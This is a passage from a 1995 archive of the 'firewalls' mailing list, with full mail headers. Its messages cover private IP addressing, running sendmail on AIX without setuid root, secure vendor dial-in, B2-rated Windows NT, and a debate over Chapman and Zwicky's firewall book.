(8.6.9/Miles-950430-1) id QAA07562 for firewalls-outgoing; Sat, 7 Oct 1995 16:35:57 -0700 Received: from isgate.is (isgate.is [193.4.58.51]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA07549 for ; Sat, 7 Oct 1995 16:35:53 -0700 Received: from xanadu.centrum.is by isgate.is (8.6.10/ISnet/14-10-91); Sat, 7 Oct 1995 23:34:23 GMT Received: by xanadu.centrum.is (5.x/ISnet/11-02-92); Sat, 7 Oct 1995 23:34:18 GMT Date: Sat, 7 Oct 1995 23:34:18 +0000 (GMT) From: KiDDi To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk sunscribe firewalls-digest From firewalls-owner Sun Oct 8 08:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA16514 for firewalls-outgoing; Sun, 8 Oct 1995 08:07:05 -0700 Received: from utrecht.knoware.nl (utrecht.knoware.nl [193.78.120.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA16507 for ; Sun, 8 Oct 1995 08:06:59 -0700 Received: from csehost.idiscover.co.uk (csehost.idiscover.co.uk [194.128.134.177]) by utrecht.knoware.nl (8.6.12/8.6.12) with SMTP id QAA12630 for ; Sun, 8 Oct 1995 16:04:48 +0100 Date: Sun, 8 Oct 1995 16:04:48 +0100 Message-Id: <199510081504.QAA12630@utrecht.knoware.nl> X-Sender: njb@pop.knoware.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: njb@knoware.nl (Niels Bjergstrom) Subject: Brent Chapman in Europe X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A number of people have informed me that they did not see the original announcement of Brent's tutorials in Europe because of vacation. I probably should have reposted it, but I rarely use the net for advertising purposes. However, there is still space at the following tutorials: In Munchen Oct 16, in Amsterdam Oct 17 and in London Oct 19. Email me for further info in case of interest. Niels -- Niels J Bjergstrom, Ph.D., m/ISACA Tel. +31 70 362 2269 -- -- Computer Security Engineers, Ltd. Fax. +31 70 365 2286 -- -- Postbus 85 502, NL-2508 CE Den Haag London: +44 181 519 8011 -- -- Netherlands Email: njb@csehost.knoware.nl -- -- PGP Public key available on request - please use when mailing vira -- From firewalls-owner Sun Oct 8 09:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA17535 for firewalls-outgoing; Sun, 8 Oct 1995 08:54:53 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA17528 for ; Sun, 8 Oct 1995 08:54:50 -0700 Received: (hcb@localhost) by clark.net (8.6.12/8.6.5) id LAA15553; Sun, 8 Oct 1995 11:53:30 -0400 From: Howard Berkowitz Message-Id: <199510081553.LAA15553@clark.net> Subject: RFC1597 subtleties To: firewalls@greatcircle.com Date: Sun, 8 Oct 1995 11:53:29 -0400 (EDT) Cc: hcb@clark.net (Howard Berkowitz) X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 1269 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There have been several discussions going that deal purely with RFC1597, or its use with network address translation. While this might be slightly far afield, there are some subtleties of certain ways to use RFC1597. I refer specifically to the use of the "class A block," 10.0.0.0, rather than the Class B or Class C blocks, and potential interactions with routing. If one uses 10.0.0.0 with a classful routing protocol such as RIP or IGRP, there will be no opportunity for route summarization. For each additional subnet, the total routing update size will grow by at least 24 bytes for RIP and 104 bytes for IGRP. Packet fragmentation, etc., may cause additional growth. There's no free lunch. If one uses the Class B or Class C blocks, one must be careful to avoid discontiguous subnets if also using a classful routing protocol. Discontiguous subnets arise when two subnets of one major network are separated by a subnet of another major network (e.g., two LANs in 172.20.0.0 are interconnected by a serial line in 172.21.0.0). This won't work unless a classless routing protocol such as OSPF, EIGRP, or integrated IS-IS are used. Classless routing protocols also would allow summarization with 10.0.0.0. They are, however, harder to configure. Howard From firewalls-owner Sun Oct 8 09:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA18107 for firewalls-outgoing; Sun, 8 Oct 1995 09:24:04 -0700 Received: from iez.com (mail.iez.com [194.77.84.39]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA18100 for ; Sun, 8 Oct 1995 09:23:48 -0700 Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA07034; Sun, 8 Oct 1995 17:22:07 +0100 Message-Id: <9510081622.AA07034@iez.com> Received: from sphpv01(172.16.13.11) by iez.com via smap (V1.3) id sma006776; Sun Oct 8 17:21:51 1995 Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA18497; Sun, 8 Oct 95 17:21:47 +0100 Received: by inhps-a (1.38.193.3/16.2) id AA11465; Sun, 8 Oct 95 17:21:46 +0100 From: Rolf-Weber Subject: sendmail on AIX without suid root? To: firewalls@greatcircle.com Date: Sun, 8 Oct 95 17:21:46 MEZ Mailer: Elm [revision: 70.85] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, i'm running an application gateway with the TIS toolkit on a AIX 3.2 workstation. smap and smapd work fine, but i wish to remove the ugly suid root bit from /usr/sbin/sendmail. I did it, made the spool directory writable for it, but it didn't work. In my syslog appeared "sendmail[14414]: send-mail : auditproc: Not owner" I found nothing in the FAQs, neither in the sendmail nor the AIX related. Any idea? TIA, rolf From firewalls-owner Sun Oct 8 09:30:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA17833 for firewalls-outgoing; Sun, 8 Oct 1995 09:11:36 -0700 Received: from rds.com (wpgate.rds.com [206.54.49.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA17826 for ; Sun, 8 Oct 1995 09:11:33 -0700 Received: from RDS-Message_Server by rds.com with Novell_GroupWise; Sun, 08 Oct 1995 09:03:53 -0700 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Sun, 08 Oct 1995 09:11:58 -0700 From: Doug Kaye To: firewalls@GreatCircle.COM Subject: Firewall Subcontractor Wanted (Bay Area) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are an Internet/email integrator in the San Francisco Bay Area and are beginning to receive a fair number of requests for quality firewall plans and implementations. Our workload does not permit us to address all of these opportunities directly. We are looking for experienced firewall designers who are willing to work as subcontractors to RDS. If you are interested, please email me directly with qualifications (including security products you have used), your rates as a subcontractor and a brief statement of your philosophy towards the security audit and planning process. Please do not respond if you are not in the SF Bay Area or if you are not very experienced in this area. We've got no shortage of people who *want* to be firewall designers -- we're looking for those few who are already good at it. We're not an Internet startup. We are a 17 year old integrator serving major California based companies. Check us out at http://www.rds.com. Thanks. ...doug ============================================================ Doug Kaye Rational Data Systems, Novato, CA Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com From firewalls-owner Sun Oct 8 13:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA20916 for firewalls-outgoing; Sun, 8 Oct 1995 13:17:21 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA20909 for ; Sun, 8 Oct 1995 13:17:13 -0700 Date: Sun, 8 Oct 95 16:10 EDT From: Wilner@DOCKMASTER.NCSC.MIL Subject: new firewall book (Chapman & Zwicky) To: firewalls@GREATCIRCLE.COM Message-ID: <951008201044.786003@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I just purchased and read Chapman and Zwicky's new book, Building Internet Firewalls. The discussions are clear, the authors' mastery of the technology is impressive, and the pictures are marvelous. Yet, just as in the other firewall books, there is no mention of "meatier" INFOSEC issues, such as high-assurance trusted platforms or formal modeling of TCP/IP protocols. There is little substantive discussion of denial of service, which is quite important. There is no mention of integrating firewall technology with COTS security products other than I&A tools. No mention of emerging technology pursuant to either NSA's MISSI program or NIST's PKC entity authentication research (q.v. Draft FIPS PUB "JJJ") is to be found. What's the deal? It seems that the participants in this august forum are concerned only about cookbook-style approaches. "How can I run such-and-such application?" "What ports should I block in order to securely operate FOOBAR?" "What commands do I issue to my Telebit?" "How can I get DNS to do such-and-such on a screened-subnet doodad with DYNIX and NetWare?" This is all that people seem to want to discuss. It is noted with sadness that challenges such as the one detailed in the preceding four paragraphs are never responded to. One takes that to mean either that everyone is in complete agreement and therefore no discussion is required, or that no one feels qualified to disagree in writing. Bruce D. Wilner -------------------------------------------------- no PGP key, no witticisms, no cutesy line graphics From firewalls-owner Sun Oct 8 16:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA23438 for firewalls-outgoing; Sun, 8 Oct 1995 15:37:57 -0700 Received: from dns.state.mi.us (dns.state.mi.us [204.25.6.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA23431 for ; Sun, 8 Oct 1995 15:37:53 -0700 Received: from STATE.MI.US (ngwsmtp.state.mi.us [167.240.253.6]) by dns.state.mi.us (8.6.12/8.6.12) with SMTP id SAA05984 for ; Sun, 8 Oct 1995 18:30:56 -0400 Received: from MI-Message_Server by STATE.MI.US with Novell_GroupWise; Sun, 08 Oct 1995 18:28:11 -0400 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Sun, 08 Oct 1995 18:37:17 -0400 From: Mark Jaeger To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #580 -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Until I return from vacation on October 16, Linda Baker will receive a forwarded copy of all my correspondence. From firewalls-owner Sun Oct 8 17:00:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24446 for firewalls-outgoing; Sun, 8 Oct 1995 16:57:55 -0700 Received: from ace.mid.net (ace.mid.net [198.247.225.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA24439 for ; Sun, 8 Oct 1995 16:57:51 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by ace.mid.net (8.6.10/8.6.9) with ESMTP id SAA09586; Sun, 8 Oct 1995 18:56:20 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id SAA09074; Sun, 8 Oct 1995 18:56:39 -0500 From: Alan Hannan Message-Id: <199510082356.SAA09074@gaijin.mid.net> Subject: Re: new firewall book (Chapman & Zwicky) To: Wilner@DOCKMASTER.NCSC.MIL Date: Sun, 8 Oct 1995 18:56:38 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <951008201044.786003@DOCKMASTER.NCSC.MIL> from "Wilner@DOCKMASTER.NCSC.MIL" at Oct 8, 95 04:10:00 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 3532 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ......... Wilner@DOCKMASTER.NCSC.MIL is rumored to have said: ] ] Yet, just as in the other firewall books, there is no mention ] of "meatier" INFOSEC issues, such as high-assurance trusted ] platforms or formal modeling of TCP/IP protocols. There is IMHO this is not 'firewalling (read:separating networks according to a given security policy)' these are host and network issues. True, both of these are required knowlege for firewalling, and also subsets of firewall theory. However, they are not wholly firewall related, and in my opinion should be considered separate topics. When one considers accounting, rarely do they cover aspects of addition. ] little substantive discussion of denial of service, which is ] quite important. There is no mention of integrating firewall ] technology with COTS security products other than I&A tools. ] No mention of emerging technology pursuant to either NSA's ] MISSI program or NIST's PKC entity authentication research ] (q.v. Draft FIPS PUB "JJJ") is to be found. And this makes me quite happy. I have no interest in MISSI compliance, and I have yet to have a customer request it. If they did, I'd like to go read a book about MISSI and anal proprietary government standards, not a book about firewalling a network from the Internet. ] What's the deal? It seems that the participants in this ] august forum are concerned only about cookbook-style ] approaches. "How can I run such-and-such application?" "What ] ports should I block in order to securely operate FOOBAR?" ] "What commands do I issue to my Telebit?" "How can I get DNS ] to do such-and-such on a screened-subnet doodad with DYNIX and ] NetWare?" This is all that people seem to want to discuss. This may be true with regards to books about firewalls, however on at least two occassions in as many months we have had discussions about MISSI and Fortezza. ] It is noted with sadness that challenges such as the one ] detailed in the preceding four paragraphs are never responded ] to. One takes that to mean either that everyone is in ] complete agreement and therefore no discussion is required, or ] that no one feels qualified to disagree in writing. Always the rebel, I had to reply :) Most people here are involved in corporate network security. It's my opinion the breakdown would go something like this --> Corporate -- 35% Vendors and Developers -- 35% Government Agencies -- 15% Educational and Theorists -- 15% If you buy into this, then perhaps you'd buy that 75% of the money/focus for Vendors and Developers is for Corporate network security. Hence, 35% + (.75 * 35%) = at least 61% of the people here are interested in corporate network security. Couple that with the focus on Government Agencies --> 15% + .25*35% ==> 23% and we see that the government compliance issues are not as predominant. Therefore, I think that explains it. However, you make good points as to the desire to increase the "meat" discussed here. What is the general concensus? Are topics like Fortezza, B-1 compliance, etc welcome? I don't mind them, though on the same token, perhaps a mail list dedicated to the broaded topic of Information Security would be appropriate. Conversely, if the topic directly relates to firewalls (like Fortezza might) then I'm interested... Hmm.... -- Alan Hannan http://www.mid.net/~alan 402/472-0239 Network Systems/Security Administrator MIDnet, Inc. From firewalls-owner Sun Oct 8 17:30:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA24803 for firewalls-outgoing; Sun, 8 Oct 1995 17:19:36 -0700 Received: from acsweb (acsweb.acs.usm.maine.edu [130.111.128.23]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA24796 for ; Sun, 8 Oct 1995 17:19:32 -0700 Received: from doc.cs.usm.maine.edu by acsweb (5.x/SMI-SVR4) id AA18810; Sun, 8 Oct 1995 20:18:12 -0400 Received: by doc.cs.usm.maine.edu; (5.65/1.1.8.2/04Oct95-1047AM) id AA02933; Sun, 8 Oct 1995 20:18:02 -0400 From: Edward Maillet Message-Id: <9510090018.AA02933@doc.cs.usm.maine.edu> Subject: Vendor Dial-in To: firewalls@greatcircle.com Date: Sun, 8 Oct 1995 20:18:01 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone have any good ideas for allowing secure vendor dial-in? We have several vendors that occassionally need to dial-in to our equipment to figure what we broke :) or to assist in certain problems or configurations. The most secure and reasonable flexible method is yanking the phone cord from the wall until someone from the vendor calls in reference to a current problem asking to dial-in. The problem with that is how do I know its really the vendor? (Then again when the repair guy shows up with an MCI jacket, how do I really know he's from MCI. Yeah yeah yeah.) I just recently had a problem that required my vendor to periodically dial-in to some equipment around the clock. I like my job but I'm not going to hang out 24hrs a day plugging & unplugging a stupid phone cord. We have a new database product that the vendor (a differnet one no less) requires an ISDN line running PPP to connect to our network for support. Yipes! This one I really don't like. I've thought about running the ISDN to a router outside my firewall and making them come through it. Right now my firewall is config'd not to let anyone in frome the outside period. I suppose I could setup something secure using the filtering capabilities of my router AND S/Key or SecureID on my firewall, but that doesn't seem very practical. I can here them calling up and saying the lost the secureID card! Any ideas? I hope this isn't one of those "Well, there is some risk you have to have." ----- Ed Maillet maillet@cs.usm.maine.edu From firewalls-owner Sun Oct 8 17:31:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA25023 for firewalls-outgoing; Sun, 8 Oct 1995 17:29:25 -0700 Received: from mimos.my (mimos.my [192.228.128.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA25016 for ; Sun, 8 Oct 1995 17:29:17 -0700 Received: from ms.mimos.my (ms.mimos.my [192.228.129.33]) by mimos.my (8.6.12/8.6.12) with SMTP id IAA04881; Mon, 9 Oct 1995 08:27:45 +0800 Received: by ms.mimos.my (5.64/7.0) id AA03125; Mon, 9 Oct 95 08:27:44 +0800 Date: Mon, 9 Oct 1995 08:27:44 +0800 From: Musaddik Mokhtar To: fwtk-users@tis.com Cc: firewalls@greatcircle.com Subject: http-gw with authentication Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I was wondering if anybody has gotten the FWTK's auth to work with http-gw. I would want it to work like when used with tn-gw and ftp-gw, i.e. users are authenticated before using the gateway. Would appreciate any help from experts and people who had gotten it to work, out there. Thanks in advance. - Musaddik. _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ _/ _/ _/ _/ Musaddik Mokhtar _/ dique@ms.mimos.my _/ _/ System Support Group _/ http://www.bsk.mimos.my/~dique _/ _/ Division of Computer Systems, _/ _/ _/ MIMOS, Malaysia _/ _/ _/ _/ _/ _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ From firewalls-owner Sun Oct 8 22:32:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA02248 for firewalls-outgoing; Sun, 8 Oct 1995 22:30:19 -0700 Received: from spaatz.cap.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA22664 for ; Sun, 8 Oct 1995 14:16:12 -0700 Received: from Microsoft Mail (PU Serial #0) by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct08.161000.0.15735; Sun, 08 Oct 1995 16:15:32 -0500 From: CMILAM@cap.af.mil (Milam, Charles R. 1LT CAP) To: firewalls@GREATCIRCLE.COM (firewalls), Wilner@DOCKMASTER.NCSC.MIL (Wilner) Message-ID: <1995Oct08.161000.0.15735@spaatz.cap.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Sun, 08 Oct 1995 16:15:32 -0500 Subject: RE: new firewall book (Chapman & Zwicky) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > It is noted with sadness that challenges such as the one > detailed in the preceding four paragraphs are never responded > to. One takes that to mean either that everyone is in > complete agreement and therefore no discussion is required, or > that no one feels qualified to disagree in writing. I take it to mean that most folks are, like myself, already working 60-hour weeks, and therefore just too darn busy for academic discussion. Gimme that patch, lemme plug that hole, and let me get to item #352 on my to-do list. I found Chapman & Zwicky's book to be "just right" for a multitude of audiences. I have already successfully used excerpts from the book to get even our most "technically challenged" administrators up to speed and in agreement about our network's security. Chuck "Speaking only for myself..." From firewalls-owner Mon Oct 9 04:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA08078 for firewalls-outgoing; Mon, 9 Oct 1995 03:43:48 -0700 Received: from lokkur.dexter.mi.us (dexter-gw.dexter.msen.com [148.59.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA08071 for ; Mon, 9 Oct 1995 03:43:43 -0700 Received: (scs@localhost) by lokkur.dexter.mi.us (8.6.12/8.6.5) id GAA17153 for firewalls@GreatCircle.COM; Mon, 9 Oct 1995 06:40:44 -0400 Newsgroups: local.firewalls Path: scs From: scs@lokkur.dexter.mi.us (Steve Simmons) Subject: Re: new firewall book (Chapman & Zwicky) Message-ID: <1995Oct9.104042.17112@lokkur.dexter.mi.us> Organization: Inland Sea References: <951008201044.786003@DOCKMASTER.NCSC.MIL> Distribution: local Date: Mon, 9 Oct 95 10:40:42 GMT Lines: 14 Apparently-To: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Wilner@DOCKMASTER.NCSC.MIL writes: >Yet, just as in the other firewall books, there is no mention >of "meatier" INFOSEC issues, such as high-assurance trusted >platforms or formal modeling of TCP/IP protocols. There is >little substantive discussion of denial of service . . . [[ other criticisms deleted ]] Sounds to me like you've identified a market. Call O'Reilly, see if you can sell it. -- "For the last five years, the number of machines on the network has been rising between five and 10 times faster than the number of transistors on a chip." `THE COMING SOFTWARE SHIFT' by George Gilder, Forbes, 8/8/95 From firewalls-owner Mon Oct 9 04:30:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA08493 for firewalls-outgoing; Mon, 9 Oct 1995 04:04:45 -0700 Received: from TYO2.gate.nec.co.jp (TYO2.gate.nec.co.jp [202.32.8.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA08486 for ; Mon, 9 Oct 1995 04:04:41 -0700 Received: from mailsv.nec.co.jp ([133.200.254.203]) by TYO2.gate.nec.co.jp (8.6.11+2.5Wb2/3.3Wb-NEC-TYO2) with ESMTP id UAA19508 for ; Mon, 9 Oct 1995 20:03:18 +0900 Received: from pepsi.necsin.fc.nec.co.jp ([203.127.253.3]) by mailsv.nec.co.jp (8.6.12+2.5Wb7/3.3W-95100416) with SMTP id UAA01233 for ; Mon, 9 Oct 1995 20:03:14 +0900 Received: from wpo by pepsi.necsin.fc.nec.co.jp (5.64/6.4J.5) id AA01660; Mon, 9 Oct 95 20:03:57 +0900 Received: from NEC-Message_Server by wpo.necsin.fc.nec.co.jp with Novell_GroupWise; Mon, 09 Oct 1995 18:59:52 +0800 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 09 Oct 1995 15:08:20 +0800 From: Xin LI To: firewalls@GreatCircle.com Subject: B2 rated WIndows NT? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, there: It's said that there is secure version of Windows NT rated B class(probably B2) available. Does any one know where can I get more information about that? Any advice and information are welcome and very appreciated. Thanks in advance, Li, Xin Senior System Engineer NEC Singapore Pte Ltd No. 1 Maritime Square #12-10 World Trade Center Tel: +65-277-2227 Singapore, 099253 Fax:+65-271-5988 Republic of Singapore Email: lixin@wpo.necsin.fc.nec.co.jp From firewalls-owner Mon Oct 9 04:31:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA09258 for firewalls-outgoing; Mon, 9 Oct 1995 04:23:54 -0700 Received: from TYO2.gate.nec.co.jp (TYO2.gate.nec.co.jp [202.32.8.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA09244 for ; Mon, 9 Oct 1995 04:23:47 -0700 Received: from mailsv.nec.co.jp ([133.200.254.203]) by TYO2.gate.nec.co.jp (8.6.11+2.5Wb2/3.3Wb-NEC-TYO2) with ESMTP id UAA21226 for ; Mon, 9 Oct 1995 20:22:22 +0900 Received: from pepsi.necsin.fc.nec.co.jp ([203.127.253.3]) by mailsv.nec.co.jp (8.6.12+2.5Wb7/3.3W-95100416) with SMTP id UAA02949 for ; Mon, 9 Oct 1995 20:22:18 +0900 Received: from wpo by pepsi.necsin.fc.nec.co.jp (5.64/6.4J.5) id AA01680; Mon, 9 Oct 95 20:22:58 +0900 Received: from NEC-Message_Server by wpo.necsin.fc.nec.co.jp with Novell_GroupWise; Mon, 09 Oct 1995 19:22:02 +0800 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 09 Oct 1995 19:21:16 +0800 From: Xin LI To: firewalls@GreatCircle.com Subject: B2 rated WIndows NT? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, there: It's said that there is secure version of Windows NT rated B class(probably B2) available. Does any one know where can I get more information about that? Any advice and information are welcome and very appreciated. Thanks in advance, Li, Xin Senior System Engineer NEC Singapore Pte Ltd No. 1 Maritime Square #12-10 World Trade Center Tel: +65-277-2227 Singapore, 099253 Fax:+65-271-5988 Republic of Singapore Email: lixin@wpo.necsin.fc.nec.co.jp From firewalls-owner Mon Oct 9 05:30:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA10987 for firewalls-outgoing; Mon, 9 Oct 1995 05:12:36 -0700 Received: from eagle.idshq.com (eagle.idshq.com [199.100.93.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA10972 for ; Mon, 9 Oct 1995 05:12:27 -0700 From: Mark_Podracky@idshq.com Received: from smtpgtwy.idshq.com (smtpgtwy.idshq.com [199.100.93.5]) by eagle.idshq.com (8.6.10/8.6.10) with SMTP id EAA12719; Mon, 9 Oct 1995 04:05:09 -0400 Received: from cc:Mail by smtpgtwy.idshq.com id AA813251431 Mon, 09 Oct 95 08:10:31 EST Date: Mon, 09 Oct 95 08:10:31 EST Message-Id: <9509098132.AA813251431@smtpgtwy.idshq.com> To: firewalls@GreatCircle.com, Xin LI Subject: Re: B2 rated WIndows NT? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There is not a B Level version currently available. There is a C2 Version available. Several companies are investigating and some have started building a B Level version, however. There are B Level network components available such as TNT DNSIX from Global Internet Software Group in Monticello, IL: Global Internet Software Group (formerly, Blue Ridge Software, Inc.) 107 S. State St., P.O. Box 406, Monticello, IL 61856 217-762-2375 Fax:-5408 Hope this helps ... Mark A. Podracky Sr. Information Security Specialist Integrated Data Systems 14170 Newbrook Drive, Suite 201 Chantilly, VA 22021-2223 703-803-9115 extension 19 ______________________________ Reply Separator _________________________________ Subject: B2 rated WIndows NT? Author: Xin LI at ccSMTP Date: 10/9/95 8:00 AM Hi, there: It's said that there is secure version of Windows NT rated B class(probably B2) available. Does any one know where can I get more information about that? Any advice and information are welcome and very appreciated. Thanks in advance, Li, Xin Senior System Engineer NEC Singapore Pte Ltd No. 1 Maritime Square #12-10 World Trade Center Tel: +65-277 -2227 Singapore, 099253 Fax:+65-271- 5988 Republic of Singapore Email: lixin @wpo.necsin.fc.nec.co.jp From firewalls-owner Mon Oct 9 07:30:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA12675 for firewalls-outgoing; Mon, 9 Oct 1995 07:20:29 -0700 Received: from uud01.capvolmac.nl (uud01.capvolmac.nl [193.78.92.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA12668 for ; Mon, 9 Oct 1995 07:20:24 -0700 Received: from inetgate.capvolmac.nl by uud01.capvolmac.nl (uud01 3.2/UCB 5.64/4.03) id AA16093; Mon, 9 Oct 1995 15:19:02 +0100 Received: from WUD00-Message_Server by inetgate.capvolmac.nl with Novell_GroupWise; Mon, 09 Oct 1995 15:17:00 +0100 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 09 Oct 1995 13:43:37 +0100 From: Sander Wels To: firewalls@greatcircle.com Subject: Vendor Dial-in (A) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Met vriendelijke groet/kind regards Sander Wels ------------------------------------------------- - Cap Volmac, - PO 2575, 3500 GN Utrecht, - The Netherlands +31-(0)30-2526828 - SWels@inetgate.capvolmac.nl - x400: S=SWels/PRMD=Cap Volmac/ADMD=400net/ - ORG=X400Gate/C=NL ------------------------------------------------- >>> Edward Maillet 09-10-1995 1:18 >>> >Anyone have any good ideas for allowing secure vendor dial-in? We are strugling with the same problem. The solution we came up with is as simple as efficient. We use PC Anywhere to remotely takeover a PC. The vendor can dial-in and hack the net while we can follow, monitor and assist, for example typing passwords. This may also be the solution for your problem where the vendor has to dial-in during a longer period of time. From firewalls-owner Mon Oct 9 08:31:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA13453 for firewalls-outgoing; Mon, 9 Oct 1995 08:04:13 -0700 Received: from pimaia1y.prodigy.com (pimaia1y.prodigy.com [192.207.105.44]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA13446 for ; Mon, 9 Oct 1995 08:04:10 -0700 Received: from sp2ctrlt.prodigy.com ([199.4.137.50]) by pimaia1y.prodigy.com (8.6.10/8.6.9) with ESMTP id KAA72076 for ; Mon, 9 Oct 1995 10:27:23 -0400 Received: (from frank@localhost) by sp2ctrlt.prodigy.com (8.6.12/8.6.12) id KAA28700; Mon, 9 Oct 1995 10:27:23 -0400 Date: Mon, 9 Oct 1995 10:27:23 -0400 (EDT) From: Frank Wortner To: firewalls@GreatCircle.Com Subject: Re: sendmail on AIX without suid root? In-Reply-To: <9510081622.AA07034@iez.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IBM's sendmail interfaces with the AIX audit subsystem --- AIX has a pile of subsystems and capabilities that no one is aware of or uses (*) --- and that requires root authority. I suspect that sendmail is trying to set some audit parameters and failing. If you still want to delete the setuid-root permissions, try replacing AIX's sendmail with the most current Berkeley sendmail (ftp://ftp.cs.berkeley.edu/ucb/sendmail/). (*) Some of them may actually be useful. -- Frank Frank Wortner, Prodigy Services Company mailto:frank@prodigy.com http://pages.prodigy.com/NY/frank Opinions are soley mine, facts belong to no one in particular. On Sun, 8 Oct 1995, Rolf-Weber wrote: > Hi all, > > i'm running an application gateway with the TIS toolkit on > a AIX 3.2 workstation. smap and smapd work fine, but i wish > to remove the ugly suid root bit from /usr/sbin/sendmail. > I did it, made the spool directory writable for it, but it > didn't work. In my syslog appeared > "sendmail[14414]: send-mail : auditproc: Not owner" > I found nothing in the FAQs, neither in the sendmail nor the AIX > related. > Any idea? > > TIA, > rolf > From firewalls-owner Mon Oct 9 09:00:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA14171 for firewalls-outgoing; Mon, 9 Oct 1995 08:33:08 -0700 Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by 